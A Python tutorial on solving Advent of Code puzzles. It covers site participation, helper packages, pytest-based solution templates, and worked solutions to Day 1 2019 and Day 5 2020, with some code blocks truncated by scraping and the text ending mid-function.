. Advent of Code puzzles are designed to be approachable by anyone with an interest in problem-solving. You don’t need a heavy computer science background to participate. Instead, Advent of Code is a great arena for learning new skills and testing out new features of Python.. To get a feeling for how an Advent of Code puzzle works, consider the Day 1 puzzle of 2020: Before you leave, the Elves in accounting just need you to fix your expense report (your puzzle input); apparently, something isn’t quite adding up. Specifically, they need you to find the two entries that sum to 2020and then multiply those two numbers together. Each year, there’s a wonderfully silly backstory that binds the puzzles together. The 2020 story describes your attempts at leaving for a well-deserved vacation, now that you’ve saved Christmas several years in a row. The story usually has no effect on the puzzles, but it’s still fun to follow along. In between the plot elements of the story, you’ll find the puzzles themselves. In this example, you’re looking for two entries in your puzzle input that sum to 2,020. After the explanation that describes the problem, you’ll usually find an example showing the calculations you’re expected to do:. The example shows you the answer for this particular list of numbers. If you were about to jump in and start solving this puzzle, you would now start thinking about how you can find the two entries in any valid list of numbers. Before getting deeper into this puzzle, however, you’ll explore how to use the Advent of Code site. How to Participate in Advent of Code You’ve seen an example of an Advent of Code puzzle. Next, you’ll learn how you can submit your answer for it. You never submit any code to solve the puzzles. You just submit the answer, which is usually a number or a text string. In general, you’ll follow a series of steps to solve a puzzle on the site: Log in on the Advent of Code website. You do this by using your credentials from another service like GitHub, Google, Twitter, or Reddit. Read the puzzle text and pay special attention to the given example. You should make sure you understand the solution for the example data. Download your personalized input for the puzzle. You’ll need this input in order to find your unique answer to the problem. Code up your solution. This is the fun part, which you’ll get a lot of practice for in the rest of this tutorial. Enter your answer to the puzzle on the puzzle page. If your answer is correct, then you earn a golden star and part two of the puzzle is opened up. Repeat steps 2 to 4 for part two of the puzzle. This second part is similar to the first, but it usually adds some twist requiring you to adapt your code. Enter your second answer on the puzzle page in order to earn your second star and finish the puzzle. Remember, you don’t submit any code—only your puzzle answers. This means that Advent of Code puzzles can be solved in any programming language. Many people use Advent of Code to practice and learn a new programming language. Eric Wastl, the creator of Advent of Code, gave a talk in 2019 where he talked about the diverse background and motivation of the people participating, among other things. Note: There is a leaderboard for Advent of Code. In general, you should ignore this leaderboard! It only shows who submitted the first 100 solutions after a puzzle opened up. To have a shot at joining the leaderboard, you need a lot of preparation, dedication, and experience with competitive programming. Instead, you should look at the private leaderboards. These become available after you’ve logged in, and they give you a chance to invite your friends and colleagues to a more relaxed community. You can choose to score your private leaderboard either based on when puzzles were solved or simply based on the number of puzzles people have solved. You can also link your name in the private leaderboards to your GitHub account, which allows you to share your solutions with your friends. You set this up by clicking Settings in the menu on the Advent of Code site after you’ve logged in. Advent of Code is completely free to use, but there are still a few different ways you can support the project: - You can share information about Advent of Code on your social media to get the word out. - You can help others by taking part in the r/adventofcode subreddit or other forums. - You can invite your friends to take part in Advent of Code, sharing your results on a private leaderboard. - You can donate to Advent of Code. If you do, then you’ll get an AoC++ badge next to your name on the site. In the next sections, you’ll see some suggestions on how you can prepare for solving Advent of Code with Python. There’s also an awesome list you can check out that links to many different resources related to Advent of Code, including many other people’s solutions. Solving Advent of Code With Python The Advent of Code has become an annual highlight for many coders around the world. In 2020, more than 170,000 people submitted their solutions. Since Advent of Code was started in 2015, more than 380,000 programmers have participated. Many of them use Python to solve the puzzles. Well, now it’s your turn! Head over to the Advent of Code website and have a look at the latest puzzles. Then, come back to this tutorial to get some tips and help to start solving Advent of Code puzzles with Python. The Anatomy of a Puzzle In this section, you’ll explore the typical anatomy of an Advent of Code puzzle. Additionally, you’ll learn about some tools you can use to interact with it. Each Advent of Code puzzle is split into two parts. When you start working on a puzzle, you only see the first part. The second part unlocks once you’ve submitted the correct answer to the first part. This is often a twist on the problem you solved in the first part. Sometimes, you’ll find it necessary to refactor your solution from part one, while other times you can solve the second part quickly based on the work you’ve already done. Both parts always use the same puzzle input. You can download your puzzle input from the puzzle page for that day. You’ll find a link after the puzzle description. Note: As mentioned earlier, your puzzle input is personalized. This means that if you discuss solutions with other people, their final answers will likely be different from yours. Everything you need to do in order to submit your puzzle solutions—except actually solving the puzzle—you can do from the Advent of Code website. You should use it to submit your first solutions so that you can get familiar with the flow. Later, there are several tools you can use to organize your Advent of Code setup and work more efficiently. For example, you can use the advent-of-code-data package to download data. It’s a Python package that you can install with pip: $ python -m pip install advent-of-code-data You can use advent-of-code-data to download a particular puzzle input set on the command line with its aocd tool. Another fun possibility is automatically downloading and caching your personalized puzzle input within your Python code: >>> from aocd.models import Puzzle >>> puzzle = Puzzle(year=2020, day=1) >>> # Personal input data. Your data will be different. >>> puzzle.input_data[:20] '1753\n1858\n1860\n1978\n' You need to set your session ID in either an environment variable or a file before you can download your personalized data with advent-of-code-data. You’ll find an explanation for this in the documentation. If you’re interested, then you can also use advent-of-code-data or aocd to submit your solutions and review your earlier answers. As part of the puzzle text, you’ll also find one or several examples typically calculated based on smaller data than your personalized input data. You should read these examples carefully and make sure you understand what you’re asked to do before you start coding. You can use the examples to set up tests for your code. One way is to manually run your solution on the example data and confirm that you’re getting the expected answer. Alternatively, you can use a tool like pytest to automate the process. Note: Test-driven development (TDD) is a process where you write tests before implementing your code. Because Advent of Code provides you with expected answers to small examples, it gives you a great opportunity to try out test-driven development on your own. You’ll learn more about TDD later when you try to solve some puzzles by yourself. You can solve all Advent of Code puzzles using just plain Python and the standard library. However, there are a few packages that can aid you as you’re putting together your solutions: advent-of-code-datacan download your input data and submit your solutions. pytestcan check your solution on the example data automatically. parsecan parse strings with a simpler syntax than regular expressions. numpycan effectively compute with arrays of numbers. coloramacan animate your solutions in the terminal. If you create a virtual environment and install those packages, then you’ll have a very solid toolbox for your Advent of Code adventures. Later, you’ll see examples of how you can use parse, numpy, and colorama to solve puzzles. The Structure of a Solution In the last section, you got familiar with how to read and understand Advent of Code puzzles. In this section, you’ll learn how you can solve them. You don’t need to do a lot of setup before you solve the Advent of Code puzzles. Have you thought about how you’d solve the puzzle that you saw earlier? Recall that you’re looking for the product of the two numbers in a list that sum to 2,020. Before moving on, think about—and maybe code up—how you’d find which two entries of the following list sum to 2,020: numbers = [1721, 979, 366, 299, 675, 1456] The following script shows one way to solve this first part of the Day 1, 2020 puzzle: 1for num1 in numbers: 2 for num2 in numbers: 3 if num1 < num2 and num1 + num2 == 2020: 4 print(num1 * num2) The nested for loop finds all combinations of two numbers from the list. The test on line 3 is actually slightly more complicated than it needs to be: you only need to test that the numbers sum to 2,020. However, by adding the condition that num1 should be smaller than num2, you avoid solutions being found twice. In this example, one solution looks like num1 = 1721 and num2 = 299, but since you can add numbers in any order, that means that also num1 = 299 and num2 = 1721 form a solution. With the extra check, only the latter combination is reported. Once you have this solution in place, you can copy your personalized input data into the numbers list and calculate your answer to the puzzle. Note: There are more efficient ways of calculating this answer than trying all possibilities. However, it’s usually a good idea to start with a basic approach. Joe Armstrong is quoted as saying: Make it work, then make it beautiful, then if you really, really have to, make it fast. 90 percent of the time, if you make it beautiful, it will already be fast. So really, just make it beautiful! (Source) — Joe Armstrong Now that you’ve seen a working solution for this puzzle, can you make it beautiful? As you’re working through more puzzles, you might start feeling that copying your data into your code and rewriting it into valid Python gets tiresome. Similarly, adding a few functions to your code gives you more flexibility later. You could use them to add tests to your code, for example. Python has many powerful features for parsing strings. In the long run, you’ll be better off leaving the input data just as you downloaded them and let Python parse them into a usable data structure. In fact, dividing your code into two functions is often beneficial. One function will parse the string input and the other will solve the puzzle. Based on these principles, you can rewrite your code: 1# aoc202001.py 2 3import pathlib 4import sys 5 6def parse(puzzle_input): 7 """Parse input""" 8 return [int(line) for line in puzzle_input.split()] 9 10def part1(numbers): 11 """Solve part 1""" 12 for num1 in numbers: 13 for num2 in numbers: 14 if num1 < num2 and num1 + num2 == 2020: 15 return num1 * num2 16 17if __name__ == "__main__": 18 for path in sys.argv[1:]: 19 print(f"\n{path}:") 20 puzzle_input = pathlib.Path(path).read_text().strip() 21 22 numbers = parse(puzzle_input) 23 print(part1(numbers)) On lines 12 to 15, you’ll recognize your solution from earlier. First of all, you’ve wrapped it in a function. This makes it easier to add automatic tests to your code later. You’ve also added a parse() function that can convert lines of strings into a list of numbers. On line 20, you use pathlib to read the contents of a file as text and strip off any blank lines at the end. Looping through sys.argv gives you all the filenames entered at the command line. These changes give you more flexibility as you’re working on your solution. Say that you’ve stored the example data in a file called example.txt and your personalized input data in a file named input.txt. You can then run your solution on any one of them, or even both, by supplying their names on the command line: $ python aoc202001.py example.txt input.txt example.txt: 514579 input.txt: 744475 514579 is indeed the answer to the problem when using the example input data. Remember, the solution for your personalized input data will be different from the one shown above. Now it’s time to give the Advent of Code website a spin! Go to the 2020 Advent of Code calendar and find the puzzle for Day 1. If you haven’t already, download your input data and calculate your solution to the puzzle. Then, enter your solution on the website and click Submit. Congratulations! You’ve just earned your first star! A Starting Template As you’ve seen above, Advent of Code puzzles follow a set structure. Therefore, it makes sense to create a template for yourself that you can use as a starting point when you start to code up a solution. Exactly how much structure you want in such a template is a matter of personal taste. To get started, you’ll explore one example of a template that’s based on the principles you saw in the previous section: 1# aoc_template)) The template has separate functions for parsing the input as well as for solving both parts of a puzzle. You don’t need to touch lines 15 to 27 at all. They take care of reading text from an input file, calling parse(), part1(), and part2(), and then report the solutions to the console. You can create a similar template for testing your solutions. Note: As mentioned earlier, the example data are useful for creating tests, as they represent known data with corresponding solutions. The following template uses pytest as a test runner. It’s prepared for three different tests, one each for the functions parse(), part1(), and part2(): 1# test_aoc_template.py 2 3import pathlib 4import pytest 5import aoc_template@pytest.mark.skip(reason="Not implemented") 20def test_parse_example1(example1): 21 """Test that input is parsed properly""" 22 assert example1 == ... 23 24@pytest.mark.skip(reason="Not implemented") 25def test_part1_example1(example1): 26 """Test part 1 on example input""" 27 assert aoc.part1(example1) == ... 28 29@pytest.mark.skip(reason="Not implemented") 30def test_part2_example2(example2): 31 """Test part 2 on example input""" 32 assert aoc.part2(example2) == ... You’ll see an example of how you can use this template later. Until then, there are a few things you should note: - As indicated on line 1, you should name your pytestfiles with a test_prefix. - Similarly, each test is implemented in a function named with a test_prefix. You can see examples of these on lines 20, 25, and 30. - You should change the import on line 5 to import your solution code. - The template assumes that the example data are stored in files named example1.txtand example2.txt. - You should remove the skip marks on lines 19, 24, and 29 when you’re ready to start testing. - You’ll need to fill in the ellipses ( ...) on lines 22, 27, and 32 according to the example data and the corresponding solutions. For example, if you were to adapt this template to the rewritten solution of the first part of the Day 1, 2020 puzzle from the previous section, then you’d need to create a file example1.txt with the following contents: 1721 979 366 299 675 1456 Next, you’d remove the skip marks for the first two tests and implement them as follows: def test_parse_example1(example1): """Test that input is parsed properly""" assert example1 == [1721, 979, 366, 299, 675, 1456] def test_part1_example1(example1): """Test part 1 on example input""" assert aoc.part1(example1) == 514579 Finally, you’d need to make sure that you’re importing your solution. If you used the filename aoc202001.py, then you should change line 5 to import aoc202001: You would then run pytest to check your solution. If you implemented your solution correctly, then you’d see something like this: $ pytest ====================== test session starts ===================== collected 3 items test_aoc202001.py ..s [100%] ================= 2 passed, 1 skipped in 0.02s ================= Note the two dots ( ..) in front of the s. They represent two tests that passed. If the tests had failed, you’d see F instead of each dot, along with a detailed explanation of what went wrong. Tools like Cookiecutter and Copier make it easier to work with templates like these. If you install Copier, then you can use a template similar to the one you’ve seen here by running the following command: $ copier gh:gahjelle/template-aoc-python advent_of_code This will set up the template for one particular puzzle in a subdirectory of the advent_of_code directory on your computer. Solution Strategies Advent of Code puzzles are very diverse. As you advance through the calendar, you’ll solve many different problems and discover many different strategies for approaching them. Some of these strategies are quite general and can be applied to any puzzle. If you find that you’re stuck on a puzzle, here are some things you can try to get unstuck: - Re-read the description. Advent of Code puzzles are typically very well specified, but some of them can be quite information heavy. Make sure you’re not missing a vital part of the puzzle. - Use the example data actively. Make sure you understand how those results are achieved, and check that your code is able to reproduce those examples. - Some puzzles may get a bit involved. Break the problem into smaller steps, and implement and test each step individually. - If your code works for the example data but not for your personalized input data, then you can build additional test cases based on numbers you’re able to calculate by hand to see whether your code covers all corner cases. - If you’re still stuck, then reach out to your friends and other puzzle solvers on some of the forums dedicated to Advent of Code and ask for hints about how they’ve solved the puzzle. As you do more and more puzzles, you’ll start to recognize some general kinds of puzzles that come up again and again. Some puzzles deal with text and passwords. Python has several powerful tools for manipulating text strings, including many string methods. To read and parse strings, it’s helpful to know the basics of regular expressions. However, you can often get very far with the third-party parse library as well. For example, say that you have the string "shiny gold bags contain 2 dark red bags." and want to parse the relevant information from it. You can use parse and its pattern syntax: >>> import parse >>>>>>> match = parse.search(pattern, string) >>> match.named {'outer_color': 'shiny gold', 'num': 2, 'inner_color': 'dark red'} In the background, parse builds a regular expression, but you use a simpler syntax similar to the one that f-strings use. In some of these text problems, you’re explicitly asked to work with code and parsers, often building a small custom assembly language. After parsing the code, you often need to run the given program. In practice, this means that you build a small state machine that can track its current state, including the contents of its memory. You can use classes to keep state together with behavior. In Python, data classes are great for quickly setting up a state machine. The following example shows the implementation of a small state machine that can handle two different instructions: 1from dataclasses import dataclass 2 3@dataclass 4class StateMachine: 5 memory: dict[str, int] 6 program: list[str] 7 8 def run(self): 9 """Run the program""" 10 current_line = 0 11 while current_line < len(self.program): 12 instruction = self.program[current_line] 13 14 # Set a register to a value 15 if instruction.startswith("set "): 16 register, value = instruction[4], int(instruction[6:]) 17 self.memory[register] = value 18 19 # Increase the value in a register by 1 20 elif instruction.startswith("inc "): 21 register = instruction[4] 22 self.memory[register] += 1 23 24 # Move the line pointer 25 current_line += 1 The two instructions set and inc are parsed and handled within .run(). Note that the type hints on lines 5 and 6 use a newer syntax that only works on Python 3.9 and later versions. If you’re using an older version of Python, then you can import Dict and List from typing instead. To run your state machine, you first initialize it with an initial memory and load the program into the machine. Next, you call .run(). When the program is done, you can inspect .memory to see the new state of your machine: >>> state_machine = StateMachine( ... memory={"g": 0}, program=["set g 44", "inc g"] ... ) >>> state_machine.run() >>> state_machine.memory {'g': 45} This program first set g to the value of 44, then increased it, leaving it at its final value of 45. Some fun puzzles involve grids and labyrinths. If your grid has a fixed size, then you can use NumPy to get an effective representation of it. Labyrinths are often useful to visualize. You can use Colorama to draw directly in your terminal: import numpy as np from colorama import Cursor grid = np.array( [ [1, 1, 1, 1, 1], [1, 0, 0, 0, 1], [1, 1, 1, 0, 1], [1, 0, 0, 2, 1], [1, 1, 1, 1, 1], ] ) num_rows, num_cols = grid.shape for row in range(num_rows): for col in range(num_cols): symbol = " #o"[grid[row, col]] print(f"{Cursor.POS(col + 1, row + 2)}{symbol}") This script shows an example of storing a grid using a NumPy array and then using Cursor.POS from Colorama to position the cursor in the terminal to print out the grid. When you run this script, you’ll see an output like the following: ##### # # ### # # o# ##### Visualizing your code as it runs can be fun and also give you some good insights. It can also be an invaluable help when you’re debugging and don’t quite understand what’s happening. So far in the tutorial, you’ve gotten some general tips on how you can work with Advent of Code puzzles. In the next sections, you’ll get more explicit and solve two puzzles from earlier years. Practicing Advent of Code: Day 1, 2019 The first puzzle you’ll attempt to solve on your own is Day 1, 2019, called The Tyranny of the Rocket Equation. This is a typical Day 1 puzzle in that the solution isn’t very involved. It’s a great exercise to get used to how Advent of Code works and to check that your environment is properly set up. Part 1: Puzzle Description In the 2019 storyline, you’re rescuing Santa, who’s become stranded at the edge of the solar system. In the first puzzle, you’re getting your rocket ready for launch:. The example data look like. You need to calculate the total fuel requirements for your spacecraft:? Now it’s time to try to solve the puzzle on your own! It’s probably the most fun to download your personalized input data and check your solution on Advent of Code so that you can earn your stars. However, feel free to solve the puzzle based on the example data provided above if you’re not ready to sign in to Advent of Code yet. Part 1: Solution Once you’re done with the puzzle and you’ve earned your star, you can expand the collapsed block to see a discussion of the puzzle solution: This solution discussion is a bit more involved than what’s necessary for the puzzle. The goal is that you’ll explore some extra detail in this first solution so that you’ll be even better prepared for the next puzzles. This section is split into two parts: - A short discussion of integer division and how that can help. - A straightforward solution to the puzzle. Then, in the next section, you’ll see another solution that uses the templates for solutions and tests that you’ve seen earlier. To return to the current puzzle, take a second look at the calculation you’re asked to perform: [To] find the fuel required for a module, take its mass, divide by three, round down, and subtract 2. You can carry out these steps one after another: >>> mass = 14 >>> mass / 3 4.666666666666667 >>> int(mass / 3) 4 >>> int(mass / 3) - 2 2 For positive numbers, you can use int() to round down. If your numbers may be negative, then you should use math.floor() instead. Python, and many other programming languages, have support for dividing and rounding down in one step. This is called integer division and is done with the integer division operator ( //). You can then rewrite your previous calculation: >>> mass = 14 >>> mass // 3 4 >>> mass // 3 - 2 2 Using mass // 3 divides by three and rounds down in one step. You can now calculate the fuel for each mass and add them together to solve the puzzle: >>> masses = [12, 14, 1969, 100756] >>> total_fuel = 0 >>> for mass in masses: ... total_fuel += mass // 3 - 2 ... >>> total_fuel 34241 The four example modules need a total of 34241 fuel units. In the puzzle description, they’re listed as requiring 2, 2, 654, and 33583 fuel units, respectively. Adding these up, you get 34241, which confirms your calculations. You can replace the numbers in the masses list with your personalized input data to get your own answer to the puzzle. If you’re familiar with comprehensions and generator expressions, then you can use sum() to shorten your code: >>> masses = [12, 14, 1969, 100756] >>> sum(mass // 3 - 2 for mass in masses) 34241 With sum(), you don’t need to manually add up each fuel requirement. Instead, you can solve the current puzzle in one line of code. You’ve now solved the first part of the puzzle. However, before moving on to the second part of the puzzle, the next section shows how you can use the templates you saw earlier when solving this problem. Part 1: Solution Using Templates Expand the collapsed block below to see another solution to the first part of the Advent of Code puzzle for Day 1, 2019—this time using the templates you saw earlier to organize your code and simplify testing: If you’re going to do several Advent of Code puzzles, then it’s a good idea to organize your solutions into folders. This allows you to keep all the files related to a puzzle together. One nice way of keeping things tidy is to have one folder for each year of Advent of Code and to have folders for each day within each year’s folder. For this puzzle, you might set up something like this: advent_of_code/ │ └── 2019/ └── 01_the_tyranny_of_the_rocket_equation/ ├── aoc201901.py ├── input.txt ├── example1.txt └── test_aoc201901.py You store your personalized input data in input.txt, while example1.txt contains the example data from the puzzle description: You can then use these data to set up your first tests. Start with the test template from earlier, and fill in tests for parsing input and for solving part one: 1# test_aoc201901.py 2 3import pathlib 4import pytest 5import aoc201901def test_parse_example1(example1): 20 """Test that input is parsed properly""" 21 assert example1 == [12, 14, 1969, 100756] 22 23def test_part1_example1(example1): 24 """Test part 1 on example input""" 25 assert aoc.part1(example1) == 2 + 2 + 654 + 33583 26 27@pytest.mark.skip(reason="Not implemented") 28def test_part2_example2(example2): 29 """Test part 2 on example input""" 30 assert aoc.part2(example2) == ... You want the parser to read the text file and convert each line to a number in a list. You specify this on line 21 as the expected value in test_parse_example1(). The expected value for test_part1_example1() is the sum of the four fuel requirements mentioned in the text. Finally, add aoc201901.py based on the solution template: 1# aoc201901)) Before you start adding your solution to the template, take a minute to run pytest to confirm that the tests are indeed failing. In between a lot of details, you should get something like this: $ pytest test_aoc201901.py FFs [100%] ===================== short test summary info ===================== FAILED test_parse_example1 - assert None == [12, 14, 1969, 100756] FAILED test_part1_example1 - assert None == (((2 + 2) + 654) + 33583) ================== 2 failed, 1 skipped in 0.09s =================== Note that you have two tests that are failing—just as expected. This way of working is known as test-driven development (TDD). You first write your tests and make sure they fail. Afterward, you implement the code necessary to make them pass. This may seem like overkill for this puzzle but can be a very useful habit for more challenging problems. It’s time to add your solution to aoc201901.py. First, parse the input data. They are delivered to parse() as a text string of numbers separated by newlines ( \n) and should be converted into a list of integers: def parse(puzzle_input): """Parse input""" return [int(line) for line in puzzle_input.split("\n")] The list comprehension assembles each line into a list and converts them to integers. Run pytest again and confirm that your first test, test_parse_example1(), no longer fails. Next, add your solution to the puzzle: def part1(data): """Solve part 1""" return sum(mass // 3 - 2 for mass in data) You’re solving part one by using sum() as discussed in the previous section. Confirm that your solution is correct by running pytest one more time: $ pytest test_aoc201901.py ..s [100%] ================== 2 passed, 1 skipped in 0.01s =================== With the tests passing, you can solve the puzzle for your personalized input data by running the program against input.txt: $ python aoc201901.py input.txt input.txt: 3550236 None Your own answer will be different from what’s shown here, 3550236. The None output at the bottom represents the solution to the second part, which you haven’t implemented yet. Now might be a good time to look at part two! You can now move on to the second part of the puzzle. Are you ready for the twist? Part 2: Puzzle Description Every Advent of Code puzzle consists of two parts, where the second part is revealed only after you solve the first part. The second part is always related to the first and will use the same input data. However, you may often need to rethink your approach to the first half of the puzzle in order to account for the second half. Expand the collapsed block below to have a look at the second part of the Advent of Code puzzle for Day 1, 2019: Your quest to get the rocket off the ground continues:. Of course, adding all that fuel to your spacecraft has made it heavier. You need to add more fuel to account for the added weight, but that fuel will also need to be accounted for. To see how this works in practice, have a look at the examples: So, for each module mass, calculate its fuel and add it to the total. Then, treat the fuel amount you just calculated as the input mass and repeat the process, continuing until a fuel requirement is zero or negative. For example: - A module of mass 14requires 2fuel. This fuel requires no further fuel (2 divided by 3 and rounded down is 0, which would call for a negative fuel), so the total fuel required is still just 2. - At first, a module of mass 1969requires 654fuel. Then, this fuel requires 216more fuel ( 654 / 3 - 2). 216then requires 70more fuel, which requires 21fuel, which requires 5fuel, which requires no further fuel. So, the total fuel required for a module of mass 1969is 654 + 216 + 70 + 21 + 5 = 966. - The fuel required by a module of mass 100756and its fuel is: 33583 + 11192 + 3728 + 1240 + 411 + 135 + 43 + 12 + 2 = 50346. The examples are still using the same numbers as for part one. The fuel needed for the module with mass 12 isn’t specified, but you can calculate that it will be 2 using the same calculation as for the module with mass 14. The question you need to answer remains the same: What is the sum of the fuel requirements for all of the modules on your spacecraft when also taking into account the mass of the added fuel? (Calculate the fuel requirements for each module separately, then add them all up at the end.) Have a go at solving this part as well. Can you earn your second star? You’ll see a possible solution to part two in the next section. However, try to solve the puzzle for yourself first. If you need a hint to get started, then expand the box below: Repeated calculations like the ones in this part of the puzzle often lend themselves well to recursion. How did you do? Is your rocket ready for launch? Part 2: Solution This section shows how you can solve part two, continuing with the template you saw above: Continuing with the test-driven development workflow, start with adding the new examples to your test file. The examples are using the same numbers as part one, so you can use the same example1.txt file. You can therefore remove the example2() fixture from your test code. Next, remove the skip mark and then rename and implement test_part2_example1(): def test_part2_example1(example1): """Test part 2 on example input""" assert aoc.part2(example1) == 2 + 2 + 966 + 50346 As before, run pytest to confirm that your test is failing. Note: pytest has a nice option, -k, that you can use to only run a subset of your tests. With -k you can filter on the test names. For example, to only run the tests related to part two, you can use pytest -k part2. This is also a nice incentive to use consistent and descriptive test names. Next, it’s time for the actual implementation. Repeated calculations of fuel like you’re asked for here can be handled well using recursion. A recursive function is a function that calls itself. When implementing a recursive function, you should be conscious of including a stopping condition: When should the function stop calling itself? In this example, the stopping condition is mentioned quite explicitly in the puzzle description. You should stop when the fuel becomes zero or negative. Add the following as a new function in your aoc201901.py solution file: 1def all_fuel(mass): 2 """Calculate fuel while taking mass of the fuel into account""" 3 fuel = mass // 3 - 2 4 if fuel <= 0: 5 return 0 6 else: 7 return fuel + all_fuel(mass=fuel) Line 4 implements the stopping condition, while line 7 does the recursive call. You can add a test to check that the calculation works as expected. Note that if you’d been doing pure test-driven development, then you’d have added the test first. Add this function to your test file: def test_all_fuel(): """Test that fuel can be calculated recursively""" assert aoc.all_fuel(1969) == 966 In this test, you don’t use the input files. Instead, you check directly one of the examples given above. Before moving on to solve the whole puzzle, note that you can use the walrus operator to write the function more concisely: def all_fuel(mass): """Calculate fuel while taking mass of the fuel into account""" return 0 if (fuel := mass // 3 - 2) < 0 else fuel + all_fuel(fuel) While the code is shorter, it’s also denser. Whether you find that the end result is more readable or not is a matter of taste and experience. To finish off the puzzle, you also need to implement part2(). Your all_fuel() function calculates the fuel needed for each module, so what’s left is adding the fuel for all modules together: def part2(data): """Solve part 2""" return sum(all_fuel(mass) for mass in data) The implementation of part2() ends up being quite similar to part1(). You only need to change the fuel calculation for each mass. To finish up, run pytest to confirm that everything works. Then run your program on your input to get your final puzzle answer: $ python aoc201901.py input.txt input.txt: 3550236 5322455 Back at the Advent of Code website, enter your own answer, which will be different from the one above. Your second star is waiting! Before leaving this puzzle completely, note that it’s possible to solve the second part without using recursion. You could do the same calculations using loops instead. Here’s one possible implementation: def part2(data): """Solve part 2""" total_fuel = 0 for mass in data: while (mass := mass // 3 - 2) > 0: total_fuel += mass return total_fuel For each mass, the while loop calculates all the fuel needed and adds it to the running total fuel count. One of the fun things about challenging yourself with programming puzzles is that they give you a great opportunity to try out different solutions to problems and compare them. Congratulations! You’ve now solved an entire Advent of Code puzzle. Are you ready for a more challenging one? Practicing Advent of Code: Day 5, 2020 The second puzzle you’ll attempt to solve is the one for Day 5, 2020, called Binary Boarding. This puzzle is a bit more challenging than the previous one, but the final solution won’t require a lot of code. Start by having a look at the puzzle description for part one. Part 1: Puzzle Description In 2020, you’re trying hard to get to your well-deserved vacation spot. On Day 5, you’re about to board your plane when trouble ensues: You board your plane only to discover a new problem: you dropped your boarding pass! You aren’t sure which seat is yours, and all of the flight attendants are busy with the flood of people that suddenly made it through passport control. You write a quick program to use your phone’s camera to scan all of the nearby boarding passes (your puzzle input); perhaps you can find your seat through process of elimination. Instead of zones or groups, this airline uses binary space partitioning to seat people. A seat might be specified like FBFBBFFRLR, where Fmeans “front”, Bmeans “back”, Lmeans “left”, and Rmeans “right”. The first 7 characters will either be For B; these specify exactly one of the 128 rows on the plane (numbered 0through 127). Each letter tells you which half of a region the given seat is in. Start with the whole list of rows; the first letter indicates whether the seat is in the front ( 0through 63) or the back ( 64through 127). The next letter indicates which half of that region the seat is in, and so on until you’re left with exactly one row. For example, consider just the first seven characters of FBFBBFFRLR: - Start by considering the whole range, rows 0through 127. - Fmeans to take the lower half, keeping rows 0through 63. - Bmeans to take the upper half, keeping rows 32through 63. - Fmeans to take the lower half, keeping rows 32through 47. - Bmeans to take the upper half, keeping rows 40through 47. - Bkeeps rows 44through 47. - Fkeeps rows 44through 45. - The final Fkeeps the lower of the two, row 44. The last three characters will be either Lor R; these specify exactly one of the 8 columns of seats on the plane (numbered 0through 7). The same process as above proceeds again, this time with only three steps. Lmeans to keep the lower half, while Rmeans to keep the upper half. For example, consider just the last 3 characters of FBFBBFFRLR: - Start by considering the whole range, columns 0through 7. - Rmeans to take the upper half, keeping columns 4through 7. - Lmeans to take the lower half, keeping columns 4through 5. - The final Rkeeps the upper of the two, column 5. So, decoding FBFBBFFRLRreveals that it is the seat at row 44, column 5. Every seat also has a unique seat ID: multiply the row by 8, then add the column. In this example, the seat has ID 44 * 8 + 5 = 357. Here are some other boarding passes: - BFFFBBFRRR: row 70, column 7, seat ID 567. - FFFBBBFRRR: row 14, column 7, seat ID 119. - BBFFBBFRLL: row 102, column 4, seat ID 820. As a sanity check, look through your list of boarding passes. What is the highest seat ID on a boarding pass? There’s a lot of information in this puzzle description! However, most of it concerns how binary space partitioning works for this particular airline. Now, try to solve the puzzle for yourself! Keep in mind that if you consider it from the right perspective, the conversion from a boarding pass specification to a seat ID isn’t as complicated as it might seem at first. If you find that you’re struggling with that part, then expand the box below to see a hint on how you can get started. The boarding pass specifications are based on the binary system, just camouflaged with different characters. Can you translate the boarding passes into binary numbers? When you’re done with your solution, have a look in the next section to see a discussion about the puzzle. Part 1: Solution Now that you’ve given it a shot yourself, you can go ahead and expand the following block to see one way the puzzle can be solved: You can implement the calculation of the seat IDs based on the description in the text. The following function takes the same steps as the example: def decode(string): """Decode a boarding pass string into a number""" start, end = 0, 2 ** len(string) for char in string: if char in {"F", "L"}: end -= (end - start) // 2 elif char in {"B", "R"}: start += (end - start) // 2 return start You limit the range of possible rows or columns by start and end. While start is included in the range, end is not. This makes the math easier as it keeps the difference of end - start divisible by two throughout the calculation. You lower the upper limit for each F or L, and you increase start, the lower limit, for each B or R. You can check that the function gives the same results as the examples: >>> decode("FBFBBFF") 44 >>> decode("RLR") 5 >>> decode("FBFBBFFRLR") 357 Using decode(), you can calculate the row, the column, and the seat ID for a boarding pass. However, Python already has built-in tools to carry out the same calculation for you. The name of the puzzle, Binary Boarding, and the mention of binary space partitioning are meant to start you thinking about (or reading about) the binary system. Binary is a number system composed of two digits, 0 and 1, instead of the traditional ten digits. In the puzzle, the boarding pass specifications are really binary numbers. The difference is that they use F or L in place of 0, and B and R in place of 1. For example, FBFBBFFRLR can be translated to the binary number 01011001012. You can use Python to convert this to a regular decimal number: >>> int("0101100101", base=2) 357 Do you recognize that answer? 357 is indeed the seat ID of FBFBBFFRLR. In other words, in order to calculate seat IDs, you need to translate F, L, B, R into their respective binary digits. There are several ways you can do this, but str.translate() in Python’s standard library is probably the most convenient. Here’s how it works: >>> mapping = str.maketrans({"F": "0", "L": "0", "B": "1", "R": "1"}) >>> "FBFBBFFRLR".translate(mapping) '0101100101' The .translate() method uses character codes like 70 instead of strings like "F". You can set up the translation based on strings, though, with the convenience function str.maketrans(). You can now use these tools to solve the puzzle in three steps: - Convert boarding pass specifications to binary numbers. - Calculate the decimal value of the binary numbers to get the seat IDs. - Find the maximal seat ID. Set up your templates for the new puzzle, with input.txt containing your personalized puzzle input: advent_of_code/ │ └── 2020/ └── 05_binary_boarding/ ├── aoc202005.py ├── input.txt ├── example1.txt └── test_aoc202005.py You can add the worked examples to example1.txt as usual: FBFBBFFRLR BFFFBBFRRR FFFBBBFRRR BBFFBBFRLL Next, you’re gonna prepare the tests for the first part. Before doing so, you should think about how you want to parse the puzzle input. One option is to parse the input file into a list of strings. However, you can also think about the conversion from boarding pass specification to seat ID as part of the parsing process. One consideration to take into account is whether you think you’ll need the original boarding pass strings later—that is, in part two. You decide to take the chance, and you parse the seat IDs immediately. If the boarding pass strings are needed in part two, then you can always go back and refactor your code. Add the following tests to your test file: def test_parse_example1(example1): """Test that input is parsed properly""" assert example1 == [357, 567, 119, 820] def test_part1_example1(example1): """Test part 1 on example input""" assert aoc.part1(example1) == 820 As usual, run pytest to confirm that your tests are failing. Then it’s time to start implementing your solution. Start with the parsing: BP2BINARY = str.maketrans({"F": "0", "B": "1", "L": "0", "R": "1"}) def parse(puzzle_input): """Parse input""" return [ 